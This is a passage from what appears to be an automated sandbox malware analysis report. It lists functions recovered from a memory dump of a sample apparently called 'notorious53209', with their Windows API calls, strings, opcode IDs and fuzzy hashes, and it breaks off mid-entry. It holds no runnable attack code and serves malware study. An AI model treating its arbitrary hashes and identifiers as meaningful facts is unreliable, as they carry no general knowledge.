                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E555E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: f15bacb959cd06df61691586fb3df340f804806378888bcfa3e49be9539c84bf
                                                  • Instruction ID: e1ea4217fdb6c20568a3f7eb82b96809383b741121d7f5311792d3f8927cc4b3
                                                  • Opcode Fuzzy Hash: f15bacb959cd06df61691586fb3df340f804806378888bcfa3e49be9539c84bf
                                                  • Instruction Fuzzy Hash: 03016D31D18A1DDBCF10DFE9E8985EDBB79FB0A715F400056E801F2540DB309654D7A1
                                                  Function 008D7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CLSIDFromProgID.OLE32 ref: 008D766F
                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 008D768A
                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D758C,80070057,?,?), ref: 008D7698
                                                  • CoTaskMemFree.OLE32(00000000), ref: 008D76A8
                                                  • CLSIDFromString.OLE32(?,?), ref: 008D76B4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                  • String ID:
                                                  • API String ID: 3897988419-0
                                                  • Opcode ID: ab9f3e509ccc78677c61bd15f7c35e551cd0815239b7e8f95fef4c5584051df4
                                                  • Instruction ID: a7635f9374926504eff1c9466c5a3c43598b98c767924322e631dbb87aeb02be
                                                  • Opcode Fuzzy Hash: ab9f3e509ccc78677c61bd15f7c35e551cd0815239b7e8f95fef4c5584051df4
                                                  • Instruction Fuzzy Hash: 59017172615605AFDB209F58EC44AAA7BADFB44751F14412AFD05D2211F731DE40A7A0
                                                  Function 008D85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D8608
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D8612
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D8621
                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008D8628
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D863E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 47921759-0
                                                  • Opcode ID: 638cc2f822a088edf63282e6d9aa93387a5acd89981c49a38edb07dcab908b25
                                                  • Instruction ID: 9e201a4b9b0bb6d659ef51e331a1adea2de6af731156759d8b93155607b9c698
                                                  • Opcode Fuzzy Hash: 638cc2f822a088edf63282e6d9aa93387a5acd89981c49a38edb07dcab908b25
                                                  • Instruction Fuzzy Hash: C6F04F31219304EFEB200FA9EC9DE6B3BACFF89764B004526F945C6250CB61DD41EA60
                                                  Function 008D8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8669
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D8673
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8682
                                                  • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008D8689
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D869F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 47921759-0
                                                  • Opcode ID: 6e017a27038e6f7eeae9f455af5fb568fbf766a4864499aeceb75b3541f13297
                                                  • Instruction ID: bd1e3b698592f5a79b0e8b9180156b75416e02b111f772602558c2209d5825c7
                                                  • Opcode Fuzzy Hash: 6e017a27038e6f7eeae9f455af5fb568fbf766a4864499aeceb75b3541f13297
                                                  • Instruction Fuzzy Hash: C8F04F71214304FFEB211FA5EC9CE673BACFF89764B100126F945C7250CA61DA41EA60
                                                  Function 008DC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 008DC6BA
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 008DC6D1
                                                  • MessageBeep.USER32(00000000), ref: 008DC6E9
                                                  • KillTimer.USER32(?,0000040A), ref: 008DC705
                                                  • EndDialog.USER32(?,00000001), ref: 008DC71F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: 9959ee60187e95a7b20d141900f81f6c3f0eb04f808ca09eac0ffd650b184a94
                                                  • Instruction ID: 2a76fe1a56d3a90bbb20e009aba9cc31639f326908885cecea342dc31c8b4e50
                                                  • Opcode Fuzzy Hash: 9959ee60187e95a7b20d141900f81f6c3f0eb04f808ca09eac0ffd650b184a94
                                                  • Instruction Fuzzy Hash: 4F018F30414709ABEB315B24EC5EF9677B8FB00705F04066AF582E15E0DBE1AA54DB80
                                                  Function 008813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: 98fb3590e5e9f1502bdf04640ef8921f1fb456b176b623dfe51fa164d7e10016
                                                  • Instruction ID: e9df6116cf7c0bde632ba2b5bc7c98953684a7e95883881fad69eeed81b3a1c1
                                                  • Opcode Fuzzy Hash: 98fb3590e5e9f1502bdf04640ef8921f1fb456b176b623dfe51fa164d7e10016
                                                  • Instruction Fuzzy Hash: DAF0BBB4028308DFDB215F16EC1CB543FA9F702326F04C224E42985AB1C7354596EF55
                                                  Function 008D8E74 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008D8E7F
                                                  • CloseHandle.KERNEL32(?), ref: 008D8E94
                                                  • CloseHandle.KERNEL32(?), ref: 008D8E9C
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 008D8EA5
                                                  • HeapFree.KERNEL32(00000000), ref: 008D8EAC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                                  • String ID:
                                                  • API String ID: 3751786701-0
                                                  • Opcode ID: 5fd11a196b21a6896ba2a884260528a47f40ee199e95884236d9d0c8ddf35f8d
                                                  • Instruction ID: 8f9bbf84d9c719a86ad8372bf59e268435a320e341ca4ea3f4a1b51728f88cc4
                                                  • Opcode Fuzzy Hash: 5fd11a196b21a6896ba2a884260528a47f40ee199e95884236d9d0c8ddf35f8d
                                                  • Instruction Fuzzy Hash: 3AE0C236018601FFDA115FE1EC1C90ABB79FB89B62B108230F219C1870CB329560EB90
                                                  Function 008EC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 008EC69D
                                                  • CoCreateInstance.OLE32(00912D6C,00000000,00000001,00912BDC,?), ref: 008EC6B5
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                  • CoUninitialize.OLE32 ref: 008EC922
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                  • String ID: .lnk
                                                  • API String ID: 2683427295-24824748
                                                  • Opcode ID: 59ad0fba2fe2ee91a022b2d1087ac8403a6d482569853829c5435aba29a026e3
                                                  • Instruction ID: 8f4a432177ba66e2cf07f9644c3217a68676f663d31b9358a36c0191f9acfefe
                                                  • Opcode Fuzzy Hash: 59ad0fba2fe2ee91a022b2d1087ac8403a6d482569853829c5435aba29a026e3
                                                  • Instruction Fuzzy Hash: A7A11871108205AFD304FF58C891EABB7E8FF95708F044959F196D72A2EB70EA49CB52
                                                  Function 00892E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                                    • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 00887BB1: _memmove.LIBCMT ref: 00887C0B
                                                  • __swprintf.LIBCMT ref: 0089302D
                                                  Strings
                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00892EC6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                  • API String ID: 1943609520-557222456
                                                  • Opcode ID: 595ee6bf29d8f0a2669dd199bcdb715eeb50a64181cc14116fab8b876bc0bd78
                                                  • Instruction ID: fdbeb97854c37d10cee3fecbdc7b86cfffe0d14aa0457487b794782c808e3e8f
                                                  • Opcode Fuzzy Hash: 595ee6bf29d8f0a2669dd199bcdb715eeb50a64181cc14116fab8b876bc0bd78
                                                  • Instruction Fuzzy Hash: 10914531518601AFCB28FF28D885D6AB7B4FF85750F14492DF492DB2A1EA70EE44CB52
                                                  Function 008A524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 008A52DD
                                                    • Part of subcall function 008B0340: __87except.LIBCMT ref: 008B037B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__87except__start
                                                  • String ID: pow
                                                  • API String ID: 2905807303-2276729525
                                                  • Opcode ID: 2d8d8ba9f9cbd4a32296abc2af460f7e89d0c21bf531580e5252c8ff54bc4efb
                                                  • Instruction ID: 541879a80a9d71487af26c6bee33b02815af430b16128580083d08e04d8d61b9
                                                  • Opcode Fuzzy Hash: 2d8d8ba9f9cbd4a32296abc2af460f7e89d0c21bf531580e5252c8ff54bc4efb
                                                  • Instruction Fuzzy Hash: 57517B21A1DA0686EB106718C9513FF6BD0FB42754F208968E4D5C1BE9EF748CD4EE8A
                                                  Function 008A023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$+
                                                  • API String ID: 0-2552117581
                                                  • Opcode ID: a9d68d4b09078f897f7549ffdc7a96154649ecf0280d974553cc530e37552b82
                                                  • Instruction ID: e177b24426fed319861020d9ebe2817b895ba4bd35e830b76dbf98b90a4d8509
                                                  • Opcode Fuzzy Hash: a9d68d4b09078f897f7549ffdc7a96154649ecf0280d974553cc530e37552b82
                                                  • Instruction Fuzzy Hash: 3151EE7550524A9FDF25AF28C4886FA7BA6FF1A310F144167E891DB3A0D7309D42CB71
                                                  Function 008962F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memset$_memmove
                                                  • String ID: ERCP
                                                  • API String ID: 2532777613-1384759551
                                                  • Opcode ID: 0562f97a431d04ca792027b6a8745ecbad9a96628287acc8a2594f209483f29b
                                                  • Instruction ID: 464392f45572afbfa8a0129d152eb3749e6935c2edea7a04e67ba21332db2e73
                                                  • Opcode Fuzzy Hash: 0562f97a431d04ca792027b6a8745ecbad9a96628287acc8a2594f209483f29b
                                                  • Instruction Fuzzy Hash: 4B51CE719007099BDF24DFA4C8857AABBF4FF04314F24856EEA4ACA240F7709A90CB44
                                                  Function 00907648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009076D0
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009076E4
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00907708
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: SysMonthCal32
                                                  • API String ID: 2326795674-1439706946
                                                  • Opcode ID: 63ed70fb6cf2434b1bae2866b1d00f1f21c553470252108117efad1f8c15dee4
                                                  • Instruction ID: a9bd2436b8e10adca23d1250864e3622183c34a14664a78fcc2dc9318d6c49e5
                                                  • Opcode Fuzzy Hash: 63ed70fb6cf2434b1bae2866b1d00f1f21c553470252108117efad1f8c15dee4
                                                  • Instruction Fuzzy Hash: 74219132514219BFDF11CF94CC46FEA3B69EB88764F110214FE15AB1D0DAB6B8519BA0
                                                  Function 00906F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00906FAA
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00906FBA
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00906FDF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: baff54d427c5b591b8eb4c4ac036887f26f2d8c7832f7d95f60edef133c55ece
                                                  • Instruction ID: 77ae787e3f90a7f71c48f7d697350cc1a7acdeb29283822a81fc5a790cc2804f
